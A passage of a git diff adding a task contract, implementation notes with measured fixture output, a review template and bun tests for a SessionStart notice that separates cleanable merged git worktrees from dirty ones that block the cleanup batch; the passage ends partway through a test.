+`--discard-scaffold-only`. Cheapest proof: build a dirty, genuinely unmerged
+contract worktree and assert it is absent from the section.
+
+## Root Cause Evidence
+
+Required when Task Profile is `bugfix`; leave as-is otherwise.
+
+- root_cause: one sentence naming file:line/condition (testable, not "a state issue").
+- repro: the command or UI path that reproduces the symptom.
+- regression_guard: path to a test that fails on the unfixed code and passes after the fix (must also appear under exit_criteria.tests_pass).
+- pre_fix_failure_artifact: path to a captured run of regression_guard on the UNFIXED code. Capture with `bun test <regression_guard> > <artifact> 2>&1; echo "PRE_FIX_EXIT=$?" >> <artifact>` (no pipes — pipes swallow the exit status). The gate requires a non-zero `PRE_FIX_EXIT=` line plus the regression_guard path string in the artifact (see the Root Cause Evidence Gate section in docs/reference-configs/sprint-contracts.md).
+
+## Workflow Inventory
+
+- Source plan: `plans/plan-20260818-0526-worktree-backlog-notice.md`
+- Deferred-goal ledger: `tasks/todos.md`
+- Review file: `tasks/reviews/20260818-0526-worktree-backlog-notice.review.md`
+- Notes file: `tasks/notes/20260818-0526-worktree-backlog-notice.notes.md`
+- Checks file: `.ai/harness/checks/latest.json`
+- Run snapshots: `.ai/harness/runs/`
+- Scope gate: edit only paths listed under `allowed_paths`; update this contract before widening scope.
+- Completion gate: run `verify-sprint --prepare-acceptance`, record one typed AcceptanceReceipt under the frozen policy below, then run `verify-sprint`; review Markdown is projection only.
+
+## Change Assessment
+
+```json
+{"protocol":1,"oracles":[]}
+```
+
+## Acceptance Policy
+
+```json
+{"protocol":1,"reviewer":"Claude","user_waiver":"allowed"}
+```
+
+## Allowed Paths
+
+```yaml
+allowed_paths:
+  - docs/spec.md
+  - plans/
+  - tasks/todos.md
+  - tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md
+  - tasks/reviews/20260818-0526-worktree-backlog-notice.review.md
+  - tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
+  - .ai/context/capabilities.json
+  - assets/templates/helpers/
+  - scripts/
+  - src/cli/hook/
+  - tests/
+```
+
+## Evidence Requirements
+
+```yaml
+evidence_requirements:
+  # Set benchmark to required when this contract consumes the harness profile benchmark matrix.
+  benchmark: not_applicable
+```
+
+## Delegation Contract
+
+```yaml
+delegation:
+  budget:
+    tokens: null
+    runner_invocations: null
+    wall_time_minutes: null
+  permission_scope:
+    mode: inherit_allowed_paths
+    writable_paths: []
+    network: inherited
+  roles:
+    parent:
+      mode: narrate_and_gatekeep
+      purpose: approval_checkpoint_owner
+    explorer:
+      mode: read_only
+      purpose: codebase_research
+    worker:
+      mode: edit_within_allowed_paths
+      purpose: implementation
+    verifier:
+      mode: read_only
+      purpose: exit_criteria_review
+  runner:
+    preferred:
+      - subagent
+    fallback: null
+    brief_is_authoritative: true
+```
+
+## Exit Criteria (Machine Verifiable)
+
+```yaml
+exit_criteria:
+  files_exist:
+    - docs/spec.md
+  artifacts_exist:
+    - .ai/harness/checks/latest.json
+    - tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
+  tests_pass:
+    - path: tests/helper-scripts.test.ts
+  commands_succeed:
+    - bun run check:type
+```
+
+## Acceptance Notes (Human Review)
+
+- Functional behavior:
+- Edge cases:
+- Regression risks:
+
+## Rollback Point
+
+- Commit / checkpoint:
+- Revert strategy:

--- a/tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md
+++ b/tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md
@@ -77,18 +77,47 @@ than executes under `--dry-run`, so the mode never appears there at all.
 
 ## Scan bound
 
-Cap the scan at 24 worktrees. Measured cost is ~22ms per `merge-tree`
-invocation, bounding the scan near 0.5s. Above the cap, state the unchecked
-count explicitly and point at `ship-worktrees --cleanup-merged --dry-run` for
-the full list. Do not truncate silently.
+Cap the scan at 24 worktrees. The scan costs two things per worktree, not one:
+a `merge-tree` classification for every scanned worktree (~22ms), and a
+`git status --porcelain=v1 --untracked-files=all` cleanliness read for every
+worktree that classification proves merged. End-to-end measurement of
+`worktreeBacklogSessionContent` over a 25-worktree x 2555-file fixture puts the
+cold ceiling near **1.9s** (1945ms cold, ~600ms warm). Twenty-four distinct
+worktrees each pay their own cold index/lstat pass rather than sharing a warm
+cache, so a per-call figure taken from one warm worktree understates the
+aggregate by roughly 40%. Quote the cold number.
+
+This section previously read "bounding the scan near 0.5s", derived from
+`merge-tree` alone before the cleanliness read existed. The delivery falsified
+the premise, not merely the arithmetic. The cap stays 24: the reasons for it
+hold at 1.9s as they did at 0.5s. If that ceiling becomes unacceptable, the
+lever is a lower cap, not dropping the cleanliness split.
+
+Above the cap, state the unchecked count explicitly and point at
+`ship-worktrees --cleanup-merged --dry-run` for the full list. Do not truncate
+silently.
 
 ## Falsifier
 
 If the section lists a worktree that `contract-worktree cleanup` would refuse,
 the notice is worse than silence: it trains the operator to run a cleanup that
 fails, and the habit formed after that is reaching for
-`--discard-scaffold-only`. Cheapest proof: build a dirty, genuinely unmerged
-contract worktree and assert it is absent from the section.
+`--discard-scaffold-only`.
+
+Proof: build a **squash-absorbed and dirty** contract worktree and assert it is
+absent from the cleanable list, while a clean merged sibling stays listed.
+Merge state must be identical to the cleanable case so that working-tree state
+is the only difference.
+
+This section previously proposed a dirty **and unmerged** worktree as the
+cheapest proof. That fixture is not discriminating: `unmerged` excludes it on
+its own, leaving the dirtiness dimension inert, so the test passes against an
+implementation that ignores dirtiness entirely. It also understated the stake.
+A dirty merged worktree is not one refused row —
+`guard_dirty_merged_worktree ... || exit 1` (`scripts/ship-worktrees.sh:1146`)
+runs before the `DRY_RUN` branch and aborts the whole batch, so the
+recommended `--dry-run` fails too and every worktree registered after it is
+never reached. That is the accumulation dynamic of issue #196 itself.
 
 ## Root Cause Evidence
 

--- a/tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
+++ b/tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
@@ -67,15 +67,30 @@
   never reaches a session. `mandatory` stays false — an unnoticed backlog is
   untidy, not unsafe.
 
-- **Revised scan cost, flagged rather than re-tuned.** The contract derived the
-  cap of 24 from `merge-tree` alone (~22ms each, "near 0.5s"). The cleanliness
-  read adds one `git status --porcelain=v1 --untracked-files=all` per *merged*
-  candidate — measured 0.02-0.05s on this 2529-file worktree — so the
-  pathological case (24 scanned, all merged) is roughly 24 x (22ms + ~35ms)
-  ≈ 1.4s, not 0.5s. The steady state is unchanged, since the status read only
-  fires for worktrees already proven merged. The cap is contract-specified at
-  24 and was not re-tuned here; if 1.4s at SessionStart is unacceptable the
-  decision is a lower cap, not dropping the cleanliness split.
+- **Revised scan cost: ~1.9s cold, flagged rather than re-tuned.** The contract
+  derived the cap of 24 from `merge-tree` alone (~22ms each, "near 0.5s"). The
+  cleanliness read adds one `git status --porcelain=v1 --untracked-files=all`
+  per *merged* candidate.
+
+  My first estimate (~1.4s) extrapolated from a single worktree's per-call
+  range (0.02-0.05s) and undershot by about 40%. End-to-end measurement of
+  `worktreeBacklogSessionContent` over a 25-worktree x 2555-file fixture:
+
+  ```
+  run 1: 1945 ms   <- cold
+  run 2:  658 ms
+  run 3:  558 ms
+  ```
+
+  Twenty-four *distinct* worktrees each pay their own cold index/lstat pass;
+  they do not share a warm cache, which is what the single-worktree
+  extrapolation missed. SessionStart is the cold case, so **~1.9s is the
+  ceiling to quote**. Steady state is unaffected — the status read only fires
+  for worktrees already proven merged.
+
+  The cap stays 24: the two reasons for it hold at 1.9s just as at 0.5s. If
+  that ceiling ever becomes unacceptable, the lever is a lower cap, not
+  dropping the cleanliness split.
 
 - **Over-cap wording is a report, not a truncation.** Above 24 the section
   states the unchecked count and points at

--- a/tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
+++ b/tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
@@ -22,12 +22,33 @@
   which `tests/helper-scripts.test.ts` now asserts directly (sourcing with
   `--target ...` as positional parameters still produces no output).
 
-- **The section reports merge state only; it does not re-derive dirtiness.**
-  The lib's own header states the invariant: "dirty" and "unmerged" are separate
-  refusals with separate remedies, and collapsing them makes the dirty guard
-  unreachable. So `worktreeBacklogSessionContent` classifies through
-  `worktree_merge_mode` and says plainly that a dirty worktree is still refused
-  separately, instead of growing a second dirtiness authority in TypeScript.
+- **Merged worktrees split on cleanliness into two labelled lists.** The first
+  pass reported merge state only and disclaimed dirtiness in prose. The gate
+  falsified both of that pass's reasons, and the measured consequence was worse
+  than the contract's own falsifier anticipated — see "Corrected: dirty-merged
+  is a batch blocker" below. `worktreeBacklogSessionContent` now reads
+  `git status --porcelain=v1 --untracked-files=all` once per merged candidate
+  (at most 24) and renders "Blocking the batch" before "Cleanable now". Dirty
+  ones stay visible — they are the reason the rest cannot be cleaned — but are
+  never in the list the operator is invited to act on.
+
+- **Why the status read is not a second authority.** `worktree_merge_mode`
+  *decides*: ancestry or tree-equivalence, fail-closed, a predicate that drifts
+  if either implementation changes. `git status --porcelain` *observes*: git
+  reports whether a working tree has changes, nothing is derived. The existing
+  consumers already read it independently twice
+  (`dirty_paths_for_worktree` in `ship-worktrees.sh`,
+  `worktree_status_for_cleanup` in `contract-worktree.sh`), so a TS read is not
+  even a new class of duplication. This is the same line the Out of scope
+  section draws for `git worktree list --porcelain`.
+
+- **A prunable registration is withheld from both lists.** Directory deleted by
+  hand, worktree still registered: the status read fails,
+  `contract-worktree cleanup` dies on an unhandled `cd` at
+  `contract-worktree.sh:1846`, and `ship-worktrees --cleanup-merged --slug`
+  exits with "linked worktree status unavailable after repair attempt". Neither
+  list is the place to invite `git worktree prune`, so it is dropped —
+  fail-closed, matching this file's existing catch→null style.
 
 - **Silent inside a linked worktree.** Both cleanup entrypoints refuse when not
   run from the primary worktree (`is_linked_worktree` in `ship-worktrees.sh`,
@@ -45,6 +66,16 @@
   no section is actionable, so an informational-only flag would mean the notice
   never reaches a session. `mandatory` stays false — an unnoticed backlog is
   untidy, not unsafe.
+
+- **Revised scan cost, flagged rather than re-tuned.** The contract derived the
+  cap of 24 from `merge-tree` alone (~22ms each, "near 0.5s"). The cleanliness
+  read adds one `git status --porcelain=v1 --untracked-files=all` per *merged*
+  candidate — measured 0.02-0.05s on this 2529-file worktree — so the
+  pathological case (24 scanned, all merged) is roughly 24 x (22ms + ~35ms)
+  ≈ 1.4s, not 0.5s. The steady state is unchanged, since the status read only
+  fires for worktrees already proven merged. The cap is contract-specified at
+  24 and was not re-tuned here; if 1.4s at SessionStart is unacceptable the
+  decision is a lower cap, not dropping the cleanliness split.
 
 - **Over-cap wording is a report, not a truncation.** Above 24 the section
   states the unchecked count and points at
@@ -99,10 +130,78 @@ exit=0
 ```
 
 The section names exactly the worktree cleanup accepts and withholds the one it
-refuses. Regression-guarded by
-`tests/session-context.test.ts` → "FALSIFIER: a dirty, genuinely unmerged
-worktree is never listed", which binds the expectation to the lib's own verdict
-rather than to a second opinion computed inside the test.
+refuses.
+
+That fixture alone is not discriminating: the worktree is dirty **and**
+unmerged, so `unmerged` excludes it on its own and the dirtiness dimension is
+inert. The discriminating case is squash-absorbed **and** dirty — identical
+merge state to the cleanable case, differing only in working-tree state —
+covered by `tests/session-context.test.ts` → "FALSIFIER: a merged-but-dirty
+worktree is named as the batch blocker, never offered as cleanable", which
+asserts the dirty one appears only in the blocked block, the clean merged
+sibling only in the cleanable block, and binds merge state to the lib's own
+verdict (`codex/dirty-merged-demo\tabsorbed`) rather than to a second opinion
+computed inside the test.
+
+## Corrected: dirty-merged is a batch blocker, not a skipped row
+
+The first pass listed merged-but-dirty worktrees indistinguishably from clean
+ones and disclaimed it in prose with "A dirty worktree is still refused
+separately". Both of its reasons were wrong, and the disclaimer described the
+wrong failure.
+
+The lib header's "collapsing them makes the dirty guard unreachable" describes
+the cleanup *executor*, where the merge verdict decides whether control reaches
+the dirty guard. A display filter guards nothing and executes nothing, so
+nothing can become unreachable through it. The rule was applied across
+scenarios it does not cover.
+
+The measured consequence, on a fixture with three squash-absorbed worktrees
+where the dirty one (`bravo`) is registered between two clean ones:
+
+```
+=== merge authority: all three absorbed ===
+codex/alpha	absorbed
+codex/bravo	absorbed
+codex/charlie	absorbed
+
+=== ship-worktrees --cleanup-merged --dry-run ===
+[Ship] bash /private/tmp/gk196/scripts/contract-worktree.sh cleanup --slug alpha --target main --dry-run
+ship-worktrees: dirty merged linked worktree: codex/bravo at /private/tmp/gk196-wt-bravo
+ship-worktrees: dirty paths:
+  - wip.txt
+ship-worktrees: --discard-scaffold-only is blocked by non-scaffold paths:
+  - wip.txt
+dry-run exit=1
+--- charlie still registered, never reached ---
+/private/tmp/gk196-wt-charlie  f539b93 [codex/charlie]
+```
+
+Three layers, none of which "refused separately" conveys:
+
+1. `guard_dirty_merged_worktree "$branch" "$path" || exit 1`
+   (`ship-worktrees.sh:1146`) aborts the **whole batch**, not that row.
+   `charlie` is never reached. One dirty merged worktree pins every worktree
+   registered after it — that is the accumulation dynamic of #196 itself.
+2. That guard runs *before* the `DRY_RUN` branch, so the `--dry-run` the
+   section recommended as the safe first step exits 1 too.
+3. The failure message (`ship-worktrees.sh:779`) says "rerun with
+   `--discard-scaffold-only`" — the exact habit the contract's falsifier names
+   as the thing this notice must not train.
+
+A disclaimer that misdescribes the failure mode is worse than none: it builds
+the mental model "run it, dirty ones get skipped" and delivers "nothing was
+cleaned, and here is a flag that deletes your work".
+
+Output after the fix, same fixture:
+
+```
+- Blocking the batch: 1 worktree(s) merged into `main` but dirty. `--cleanup-merged` exits at the first of these it reaches -- `--dry-run` included -- so nothing after it is cleaned, which is how a backlog accumulates. Commit or extract those changes first; `--discard-scaffold-only` deletes them rather than resolving this.
+  - `bravo` at `/private/tmp/gk196-wt-bravo` (branch `codex/bravo`)
+- Cleanable now: 2 worktree(s) merged into `main` and clean.
+  - `alpha` at `/private/tmp/gk196-wt-alpha` (branch `codex/alpha`)
+  - `charlie` at `/private/tmp/gk196-wt-charlie` (branch `codex/charlie`)
+```
 
 ## Tradeoffs Considered
 
@@ -111,7 +210,9 @@ rather than to a second opinion computed inside the test.
 | Re-derive `merge-tree` in `session-context.ts` | Rejected | Restores the two-authority defect `b456121a` removed — the defect issue #196 actually was |
 | Parse `ship-worktrees --cleanup-merged --dry-run` | Rejected | Couples a hook to a human-readable format with no stability contract; `run_cmd` only echoes under `--dry-run`, so the mode never appears there |
 | Per-branch entrypoint | Rejected | N spawns per scan for no benefit over one batch call |
-| Filter dirty worktrees out of the list too | Rejected | Would add a second dirtiness authority in TS and make the shell dirty guard unreachable through the notice; the section states the separate refusal instead |
+| Report merge state only, disclaim dirtiness in prose | Rejected after measurement | Both reasons were wrong and the disclaimer misdescribed the failure: dirty-merged aborts the entire batch, `--dry-run` included, and the error recommends `--discard-scaffold-only` |
+| Drop dirty-merged worktrees silently | Rejected | They are the reason the rest cannot be cleaned; hiding them makes the backlog inexplicable |
+| Split into "Blocking the batch" / "Cleanable now" | Chosen | Visible without being invited; the only shape that matches what `cleanup_merged` actually does |
 | Stop-hook notice | Rejected (plan) | Stop fires per response; a scan up to 0.5s does not belong there |
 
 ## Open Questions
@@ -132,7 +233,14 @@ rather than to a second opinion computed inside the test.
   `session-context.ts` parse the same `git worktree list --porcelain` output in
   two languages. Not merged: the shell one is a four-line awk inside a bash-only
   loop, and the datum (which worktrees exist) is directly observable from git,
-  unlike the merge verdict which is a derived predicate.
+  unlike the merge verdict which is a derived predicate. The same line puts the
+  `git status --porcelain` read on the observable side.
+- `guard_dirty_merged_worktree` aborting the entire `--cleanup-merged` batch
+  rather than skipping the offending worktree is arguably the more valuable fix
+  for #196, since it is what pins every worktree registered after a dirty one.
+  Not touched: `ship-worktrees.sh` is named out of scope by the contract, and
+  changing an irreversible-write guard's control flow is its own work-package.
+  This section reports the behavior instead.
 
 ## Evidence Links
 

--- a/tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
+++ b/tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
@@ -1,0 +1,150 @@
+# Implementation Notes: worktree-backlog-notice
+
+> **Status**: Active
+> **Plan**: plans/plan-20260818-0526-worktree-backlog-notice.md
+> **Contract**: tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md
+> **Review**: tasks/reviews/20260818-0526-worktree-backlog-notice.review.md
+> **Last Updated**: 2026-08-18
+> **Lifecycle**: notes
+
+## Design Decisions
+
+- **Batch entrypoint, not a per-branch one.** `scripts/worktree-merge-lib.sh`
+  gained `worktree_merge_lib_main` plus a `[[ "${BASH_SOURCE[0]}" == "$0" ]]`
+  guard. One spawn classifies the whole scan; a per-branch entrypoint would put
+  the scan's cost back at N spawns for no gain. Argument parsing fails closed:
+  a missing `--target` and an unknown option both exit 2 with nothing on stdout,
+  so a caller can never read a partial classification as a complete one.
+
+- **`$0`/`BASH_SOURCE` guard rather than a separate wrapper script.** A wrapper
+  would be a second file whose only content is a call into this one. The guard
+  keeps sourcing side-effect free, which both existing consumers depend on and
+  which `tests/helper-scripts.test.ts` now asserts directly (sourcing with
+  `--target ...` as positional parameters still produces no output).
+
+- **The section reports merge state only; it does not re-derive dirtiness.**
+  The lib's own header states the invariant: "dirty" and "unmerged" are separate
+  refusals with separate remedies, and collapsing them makes the dirty guard
+  unreachable. So `worktreeBacklogSessionContent` classifies through
+  `worktree_merge_mode` and says plainly that a dirty worktree is still refused
+  separately, instead of growing a second dirtiness authority in TypeScript.
+
+- **Silent inside a linked worktree.** Both cleanup entrypoints refuse when not
+  run from the primary worktree (`is_linked_worktree` in `ship-worktrees.sh`,
+  the primary-worktree check in `contract-worktree.sh`). The section compares
+  the repo root against the first `git worktree list --porcelain` entry and
+  returns null when they differ, so it never names a command that cannot run
+  where it is read. This is the falsifier's invariant, not an extra feature.
+
+- **Accepting modes enumerated, never `!== 'unmerged'`.** Same reasoning as the
+  `cleanup_merged` branch in `ship-worktrees.sh`: a mode this reader does not
+  recognize must land on the silent side, not in a list the operator is invited
+  to act on.
+
+- **`actionable: true`.** `budgetSessionContext` drops the entire payload when
+  no section is actionable, so an informational-only flag would mean the notice
+  never reaches a session. `mandatory` stays false — an unnoticed backlog is
+  untidy, not unsafe.
+
+- **Over-cap wording is a report, not a truncation.** Above 24 the section
+  states the unchecked count and points at
+  `ship-worktrees --cleanup-merged --dry-run`. A section is also emitted when
+  nothing in the first 24 is cleanable but some remain unchecked; silence there
+  would be a claim the scan is not entitled to make.
+
+## Deviations From Plan Or Spec
+
+- None. The two rejected alternatives named in the contract (re-deriving
+  `git merge-tree --write-tree` in TypeScript; parsing
+  `ship-worktrees --cleanup-merged --dry-run` output) were not implemented.
+
+## Falsifier Result
+
+Contract falsifier: *if the section lists a worktree that
+`contract-worktree cleanup` would refuse, the notice is worse than silence.*
+
+Built a dirty, genuinely unmerged contract worktree (`codex/dirty-unmerged`,
+one real commit main does not have, plus an uncommitted `wip.txt`) in a fixture
+carrying the shipped helper projection:
+
+```
+=== 1. merge authority verdict ===
+codex/dirty-unmerged	unmerged
+=== 2. real contract-worktree cleanup ===
+contract-worktree: branch codex/dirty-unmerged is not fully merged into main; refusing cleanup
+cleanup exit=1
+=== 3. section content for the same repo ===
+content = null
+```
+
+Then added a squash-absorbed sibling to the same fixture, which is the shape
+issue #196 accumulated:
+
+```
+=== authority ===
+codex/absorbed	absorbed
+codex/dirty-unmerged	unmerged
+=== real cleanup dry-run for the absorbed one ===
+[ContractWorktree] Merge check for codex/absorbed: absorbed into main (squash-equivalent tree)
+[ContractWorktree] dry-run cleanup slug=absorbed target=main
+[ContractWorktree] would remove worktree: /private/tmp/falsifier-196-wt-absorbed
+[ContractWorktree] would delete branch: codex/absorbed
+exit=0
+=== section content ===
+# Cleanable Contract Worktrees
+
+- 1 contract worktree(s) already merged into `main`. Nothing was deleted.
+  - `absorbed` at `/private/tmp/falsifier-196-wt-absorbed` (branch `codex/absorbed`)
+- Deletion stays yours: review with `repo-harness run ship-worktrees --cleanup-merged --dry-run`, then run `repo-harness run ship-worktrees --cleanup-merged` from this worktree. A dirty worktree is still refused separately.
+```
+
+The section names exactly the worktree cleanup accepts and withholds the one it
+refuses. Regression-guarded by
+`tests/session-context.test.ts` → "FALSIFIER: a dirty, genuinely unmerged
+worktree is never listed", which binds the expectation to the lib's own verdict
+rather than to a second opinion computed inside the test.
+
+## Tradeoffs Considered
+
+| Option | Decision | Reason |
+|--------|----------|--------|
+| Re-derive `merge-tree` in `session-context.ts` | Rejected | Restores the two-authority defect `b456121a` removed — the defect issue #196 actually was |
+| Parse `ship-worktrees --cleanup-merged --dry-run` | Rejected | Couples a hook to a human-readable format with no stability contract; `run_cmd` only echoes under `--dry-run`, so the mode never appears there |
+| Per-branch entrypoint | Rejected | N spawns per scan for no benefit over one batch call |
+| Filter dirty worktrees out of the list too | Rejected | Would add a second dirtiness authority in TS and make the shell dirty guard unreachable through the notice; the section states the separate refusal instead |
+| Stop-hook notice | Rejected (plan) | Stop fires per response; a scan up to 0.5s does not belong there |
+
+## Open Questions
+
+- SessionStart is the only notice point. A backlog that accrues mid-session
+  waits for the next session start. Accepted: accumulation is chronic. If that
+  proves wrong, the fix is registering the same section on another event, not
+  redesigning the scan.
+
+## Out Of Scope (observed, not fixed)
+
+- `scripts/worktree-merge-lib.sh` is packaged in `assets/workflow-contract.v1.json`
+  under `helpers`, but no `repo-harness run` alias exposes the new batch
+  entrypoint. The section invokes `<repoRoot>/scripts/worktree-merge-lib.sh`
+  directly, which is where both the self-host repo and the installed projection
+  put it. Adding a runner alias is a new CLI surface and was out of scope here.
+- `list_contract_worktrees` in `ship-worktrees.sh` and the porcelain reader in
+  `session-context.ts` parse the same `git worktree list --porcelain` output in
+  two languages. Not merged: the shell one is a four-line awk inside a bash-only
+  loop, and the datum (which worktrees exist) is directly observable from git,
+  unlike the merge verdict which is a derived predicate.
+
+## Evidence Links
+
+- Checks: `.ai/harness/checks/latest.json`
+- Run snapshots: `.ai/harness/runs/`
+
+## Promotion Filter
+
+Promote a candidate to `tasks/lessons.md`, `docs/researches/`, or harness asset files only when all three hold: hard to reverse, surprising without local context, and a real trade-off existed. If any one is missing, keep it in this notes file instead.
+
+## Promotion Candidates
+
+- Promote to `tasks/lessons.md` only after a repeated correction or failure pattern.
+- Promote to `docs/researches/` only when it is durable repo knowledge with evidence.
+- Promote to harness asset files only after verification across more than one task or fixture.

--- a/tasks/reviews/20260818-0526-worktree-backlog-notice.review.md
+++ b/tasks/reviews/20260818-0526-worktree-backlog-notice.review.md
@@ -1,0 +1,84 @@
+# Task Review: worktree-backlog-notice
+
+> **Status**: Pending
+> **Plan**: plans/plan-20260818-0526-worktree-backlog-notice.md
+> **Contract**: tasks/contracts/20260818-0526-worktree-backlog-notice.contract.md
+> **Notes File**: tasks/notes/20260818-0526-worktree-backlog-notice.notes.md
+> **Checks File**: .ai/harness/checks/latest.json
+> **Last Updated**: 2026-08-18 05:26
+> **Recommendation**: fail
+> **Review Rubric Version**: 2
+> **Reviewed Subject SHA256**: pending
+> **Reviewed Subject Scope**: normalized-final-content
+> **Reviewed Target Revision**: pending
+
+## Human Review Card
+
+- Verdict: pending
+- Change type: code-change | docs-only | ledger-closeout | migration | eval-only | delegated-run | frontend
+- Intended files changed:
+- Actual files changed:
+- Commands passed:
+- Residual risks:
+- Reviewer action required: inspect diff and card
+- Rollback:
+
+## Mode Evidence
+
+- Selected route:
+- P1/P2/P3 evidence:
+- Root cause or plan evidence:
+
+## Verification Evidence
+
+- Waza `/check` run:
+- Commands run:
+- Manual checks:
+- Supporting artifacts:
+- Implementation notes reviewed:
+- Run snapshot:
+
+## Acceptance Receipt Projection
+
+> **Disposition**: unavailable
+> **Reviewer**: unavailable
+> **Source**: unavailable
+> **Actor**: not-applicable
+> **Reviewed Subject SHA256**: pending
+> **Reviewed Subject Scope**: normalized-final-content
+> **Reviewed Target Revision**: pending
+> **Verification Evidence SHA256**: pending
+> **Issued At**: pending
+
+- Summary: No AcceptanceReceipt has been recorded.
+- Findings: none
+
+## Behavior Diff Notes
+
+- ...
+
+## Residual Risks / Follow-ups
+
+- ...
+
+## Scorecard
+
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Functionality | 0/10 | |
+| Product depth | 0/10 | |
+| Design quality | 0/10 | |
+| Code quality | 0/10 | |
+
+## Failing Items
+
+- ...
+
+## Retest Steps
+
+- Re-run:
+- Re-check:
+
+## Summary
+
+- ...

--- a/tasks/todos.md
+++ b/tasks/todos.md
@@ -1,7 +1,7 @@
 # Deferred Goal Ledger
 
 > **Status**: Backlog
-> **Updated**: (archive-workflow)
+> **Updated**: 2026-08-18 05:26
 > **Scope**: Medium/long-term goals deferred from active plan execution
 
 Current plan tasks live in the active plan's `## Task Breakdown`.

--- a/tests/helper-scripts.test.ts
+++ b/tests/helper-scripts.test.ts
@@ -5662,3 +5662,103 @@ describe("Workflow helper scripts", () => {
     }
   }, 30_000);
 });
+
+// The batch entrypoint added to worktree-merge-lib.sh so a non-bash caller
+// (the SessionStart cleanable-worktree notice) can consume the single merge
+// authority instead of re-deriving `git merge-tree --write-tree`. Sourcing the
+// lib must stay side-effect free -- scripts/contract-worktree.sh and
+// scripts/ship-worktrees.sh source it for `worktree_merge_mode` alone.
+describe("worktree-merge-lib.sh batch entrypoint", () => {
+  function mergeLibFixture(): string {
+    const cwd = tmpWorkspace("worktree-merge-lib-batch");
+    mkdirSync(join(cwd, "scripts"), { recursive: true });
+    copyFileSync(join(HELPER_DIR, "worktree-merge-lib.sh"), join(cwd, "scripts/worktree-merge-lib.sh"));
+    initGitRepo(cwd);
+    writeFileSync(join(cwd, "README.md"), "# merge lib\n");
+    commitAll(cwd, "init");
+
+    // ancestor: branch tip is reachable from main.
+    expect(run("git", ["branch", "codex/ancestor-demo"], cwd).status).toBe(0);
+
+    // absorbed: squash-merged, so the tip is never an ancestor of main.
+    expect(run("git", ["checkout", "-q", "-b", "codex/absorbed-demo"], cwd).status).toBe(0);
+    writeFileSync(join(cwd, "absorbed.txt"), "absorbed\n");
+    commitAll(cwd, "absorbed feature");
+    expect(run("git", ["checkout", "-q", "main"], cwd).status).toBe(0);
+    expect(run("git", ["merge", "--squash", "codex/absorbed-demo"], cwd).status).toBe(0);
+    commitAll(cwd, "squash absorbed");
+
+    // unmerged: main does not have this content in any form.
+    expect(run("git", ["checkout", "-q", "-b", "codex/unmerged-demo"], cwd).status).toBe(0);
+    writeFileSync(join(cwd, "unmerged.txt"), "unmerged\n");
+    commitAll(cwd, "unmerged feature");
+    expect(run("git", ["checkout", "-q", "main"], cwd).status).toBe(0);
+    return cwd;
+  }
+
+  test("prints one <branch>\\t<mode> line per input branch, in input order", () => {
+    const cwd = mergeLibFixture();
+    try {
+      const res = run(
+        "bash",
+        [
+          "scripts/worktree-merge-lib.sh",
+          "--target",
+          "main",
+          "codex/unmerged-demo",
+          "codex/absorbed-demo",
+          "codex/ancestor-demo",
+        ],
+        cwd,
+      );
+      expect(res.status).toBe(0);
+      expect(res.stdout).toBe(
+        [
+          "codex/unmerged-demo\tunmerged",
+          "codex/absorbed-demo\tabsorbed",
+          "codex/ancestor-demo\tancestor",
+          "",
+        ].join("\n"),
+      );
+    } finally {
+      rmSync(cwd, { recursive: true, force: true });
+    }
+  }, 30_000);
+
+  test("sourcing stays side-effect free: no output, function still callable", () => {
+    const cwd = mergeLibFixture();
+    try {
+      const res = run(
+        "bash",
+        [
+          "-c",
+          'set -euo pipefail; source scripts/worktree-merge-lib.sh --target main codex/absorbed-demo; echo "sourced"; worktree_merge_mode codex/absorbed-demo main',
+        ],
+        cwd,
+      );
+      expect(res.status).toBe(0);
+      // The `--target ...` words are positional parameters of the source call
+      // and must be ignored; the entrypoint may not run under `source`.
+      expect(res.stdout).toBe("sourced\nabsorbed\n");
+    } finally {
+      rmSync(cwd, { recursive: true, force: true });
+    }
+  }, 30_000);
+
+  test("missing --target fails closed with exit 2 and no classification output", () => {
+    const cwd = mergeLibFixture();
+    try {
+      const res = run("bash", ["scripts/worktree-merge-lib.sh", "codex/absorbed-demo"], cwd);
+      expect(res.status).toBe(2);
+      expect(res.stdout).toBe("");
+      expect(res.stderr).toContain("--target <ref> is required");
+
+      const unknown = run("bash", ["scripts/worktree-merge-lib.sh", "--bogus"], cwd);
+      expect(unknown.status).toBe(2);
+      expect(unknown.stdout).toBe("");
+      expect(unknown.stderr).toContain("unknown option: --bogus");
+    } finally {
+      rmSync(cwd, { recursive: true, force: true });
+    }
+  }, 30_000);
+});

--- a/tests/session-context.test.ts
+++ b/tests/session-context.test.ts
@@ -1132,6 +1132,45 @@ describe("worktreeBacklogSessionSection — cleanable contract worktree notice",
     });
   }, 30_000);
 
+  test("blocked-only: the header states what the body contains, and no cleanup command is offered", () => {
+    withWorktreeFixture("wt-backlog-blocked-only", (fixture) => {
+      const dirtyPath = addAbsorbedWorktree(fixture, "only-dirty-demo");
+      writeFileSync(join(dirtyPath, "wip.txt"), "uncommitted\n");
+
+      const content = worktreeBacklogSessionContent(fixture.repoRoot);
+      expect(content).not.toBeNull();
+      // Titling an all-blocked body "Cleanable" is the same misdescription
+      // this section exists to avoid, one scale down.
+      expect(content!.split("\n")[0]).toBe("# Blocked Contract Worktrees");
+      expect(content!).toContain("Blocking the batch: 1 worktree(s)");
+      expect(content!).toContain("codex/only-dirty-demo");
+      expect(content!).not.toContain("Cleanable now");
+      // Nothing is cleanable, so the cleanup command must not be recommended.
+      expect(content!).not.toContain("then run `repo-harness run ship-worktrees --cleanup-merged`");
+    });
+  }, 30_000);
+
+  test("past the cap with every merged worktree withheld, the summary line claims only what is true", () => {
+    withWorktreeFixture("wt-backlog-cap-withheld", (fixture) => {
+      // 25 registrations, all merged (branch tip == main), all with their
+      // directories removed. Every one is withheld, so the summary line is
+      // reached with `scanned.length` worktrees that ARE merged -- the case
+      // where "none of the first N are merged into main" was literally false.
+      for (let index = 0; index < 25; index += 1) {
